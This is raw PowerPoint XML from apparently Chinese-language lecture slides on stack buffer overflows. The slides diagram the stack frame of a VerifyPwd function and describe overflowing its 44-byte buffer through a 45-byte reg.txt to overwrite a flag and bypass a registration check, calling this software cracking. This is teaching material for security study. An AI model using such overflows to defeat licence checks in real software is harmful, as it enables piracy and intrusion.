            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>	</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fclose</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>fp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPct val="125000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>}</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="矩形: 圆角 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49E36080-6564-45C2-B1A1-99CA69B89C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2468935" y="2717510"/>
              <a:ext cx="7848872" cy="5475349"/>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49752387"/>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989215" y="837929"/>
            <a:ext cx="2880320" cy="474140"/>
            <a:chOff x="4989215" y="837929"/>
            <a:chExt cx="2880320" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF07046-8558-4F68-A567-BFF83801B119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4989215" y="1312069"/>
              <a:ext cx="2880320"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4995073" y="837929"/>
              <a:ext cx="2868606" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="squar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Verify</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函数的缓冲区</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE126BC5-E658-46A2-86A7-8AD43FCC4687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5061223" y="1528093"/>
            <a:ext cx="5323566" cy="4784554"/>
            <a:chOff x="3784495" y="1824169"/>
            <a:chExt cx="5323566" cy="4784554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A139D8E-FC63-43EC-B77B-880958C29F92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="2176165"/>
              <a:ext cx="2448272" cy="115212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矩形 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE2D7C1-D5F9-4CCF-8682-830B1FE92A2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="3328293"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A0E565-9A52-4031-AC77-4A45DE2ACABE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="3760341"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2164C343-F419-4A51-B0EB-C07BA3B26AAE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="4192389"/>
              <a:ext cx="2448272" cy="5040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4" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F0397C-8CF2-4F93-854C-C3C384EECAFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="4696445"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D28FE9-1ECB-43D0-BDAC-92141C514C24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="5128493"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C33BAA-3544-4E49-97F5-726AC6ECEE6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="5560541"/>
              <a:ext cx="2448272" cy="4320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 name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C652D64-06CC-49D4-A7B8-7C9A7D2C25CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5205239" y="5992589"/>
              <a:ext cx="2448272" cy="4320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任意多边形: 形状 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8B264AB-3CAE-4738-9BE7-3AD9C3FA3B2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4411980" y="2209800"/>
              <a:ext cx="792480" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 792480"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 792480 w 792480"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="792480">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792480" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="190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9" name="任意多边形: 形状 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FC7FA01-12DF-4AE9-B57F-F6A968ECF111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4411980" y="5776565"/>
              <a:ext cx="792480" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 792480"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 0"/>
                <a:gd name="connsiteX1" fmla="*/ 792480 w 792480"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 0"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="792480">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="792480" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="190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8" name="直接箭头连接符 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC6706E4-B95C-4496-BC27-28DA5D3DEFF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="8085559" y="2032149"/>
              <a:ext cx="0" cy="4392488"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="lgDashDot"/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>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A801FB7A-505F-4800-A965-0D5FA50DA1D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3784495" y="2035510"/>
              <a:ext cx="627095" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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ESP</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 name="文本框 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A20AF5-AEC7-4A5C-82A8-5E6D473B9371}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3784495" y="5560541"/>
              <a:ext cx="655949" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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EBP</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 name="文本框 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E2FF845-EB74-4266-9356-386D4BBBCE9F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8153954" y="1824169"/>
              <a:ext cx="954107" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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低地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="文本框 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{739485E2-7720-4617-853E-A764B724CF3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8153954" y="6208613"/>
              <a:ext cx="954107" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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高地址</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="文本框 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1A6DC36-7137-45A8-85B9-0EDF9357C544}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5275629" y="2218031"/>
              <a:ext cx="2307491" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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VerifyPwd</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函数栈帧</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{216E461B-9FF4-4ED4-87C3-B9B2FD0CEF2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5275629" y="3342419"/>
              <a:ext cx="2300823" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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Buffer[0…3]</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机器码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="文本框 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B882A2-3CCF-47CB-84E3-D58812AA70F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6080561" y="3720271"/>
              <a:ext cx="697627" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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 name="文本框 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87299AF5-55A9-44E5-A186-35DFC0E15271}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5150723" y="4706530"/>
              <a:ext cx="2557303" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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Buffer[40…43]</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机器码</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52EA0FC-1DCF-4F6E-8481-9905DCDC514E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5627807" y="5106640"/>
              <a:ext cx="1665841" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>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Flag</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（覆盖）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="文本框 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B343892C-C656-49AD-B469-86A3EC7C97D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5256714" y="5568543"/>
              <a:ext cx="2451312" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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前栈帧</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EBP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（覆盖）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="文本框 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A7C4DF6-4518-49DC-9DA7-CB4B49A4200E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5364115" y="6000591"/>
              <a:ext cx="2236510" cy="400110"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyP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返回地址（覆盖）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5525935F-B35B-4158-B208-32ED40D9D48C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892871" y="2697481"/>
            <a:ext cx="3127010" cy="1892505"/>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30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pP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Verify</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函数的缓冲区为</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44</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个字节，对应的栈帧状态如下图所示：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="238604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54861" y="1581298"/>
            <a:ext cx="10747122" cy="2487877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>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利用目标：</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利用溢出覆盖临接变量，实现控制流劫持，完成软件破解。</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30000"/>
              </a:lnSpc>
            </a:pP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3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利用这个漏洞，我们可以破解该软件，让注册码无效。只需要想法淹没</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flag</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状态位，使其变为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即可，则只需要设计：</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buffer</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44</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字节）</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字节（整数</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），即在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reg.txt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中写入</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45</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个字节，其中最后</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个字节为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4" name="矩形: 圆角 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0F91AE-3150-4A4F-BE5C-5BD47F5BEB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604839" y="4336405"/>
            <a:ext cx="9937103" cy="689677"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>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如果能对</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reg.txt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写入二进制数据，我们利用</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Ultraedit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打开</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reg.txt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，并在该文件中写入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="íṡľíḍè-Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3617E447-E3F6-47BE-89E1-FDFE44868C62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390327" y="5272509"/>
            <a:ext cx="10511656" cy="1131830"/>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30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pP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123412341234123412341234123412341234123412341”</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。需要将最后</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个字节由</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ASCII-1</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改为全</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9" name="组合 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CBA4C38-133D-4615-AA5C-4AB9BDE3F67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4557168" y="533631"/>
            <a:ext cx="3625157" cy="474140"/>
            <a:chOff x="5202512" y="837929"/>
            <a:chExt cx="2453727" cy="474140"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="10" name="íślíḋè-Straight Connector 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B97828-018C-46B1-9C84-9C38BF0C2B0C}"/>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2ECAD2EB-634C-448E-A94C-5E5E4A28D7DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5221108" y="837929"/>
              <a:ext cx="2416534"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漏洞利用：覆盖临接变量</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500977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 presetClass="entr" presetSubtype="8" decel="60000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>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 grpId="0" animBg="1"/>
